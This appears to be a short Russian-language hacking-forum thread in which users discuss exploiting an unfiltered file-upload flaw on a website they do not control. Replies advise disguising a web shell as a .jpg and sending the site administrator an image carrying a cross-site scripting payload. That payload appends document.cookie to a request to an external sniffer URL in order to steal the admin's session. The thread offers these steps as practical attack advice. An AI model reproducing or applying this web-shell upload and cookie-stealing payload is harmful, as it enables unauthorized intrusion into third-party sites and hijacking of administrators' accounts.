Я вот нашел неплохую таку "штуку" на одном из интресующих меня сайтов. При добавлении новости, если вставлять картинку, - окончание файла не фильтруется, то есть я могу и php и... даже (!).exe фалы добавлять. Но вот в чем проблема. - я не знаю путь к файлу, который добавил. Так вот, как можно определить куда был залит файл, его точное местоположение. Возможно можно написать какой-то скрипт. если да, то какой. Или же, допустим залить троян. Вот, незнаю что делать прям. 8(

Загрузи картинку, нажми на неё правой кнопкой мыши, и там выбери свойства)))там смотри путь к картинке, а сл-но по этому пути и должны другие файлы лежать)))

Сделай расширение у шелла jpg и все .

Не в этом дело! Эту новость должен проверить админ перед тем как постить, то есть ты её не видешь, а тольо админ видет, и если все ок то вешает её или же наоборот удаляет... после проверки.

Отошли ему картинку с

<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>

потом жди когда на снифер что нить придет .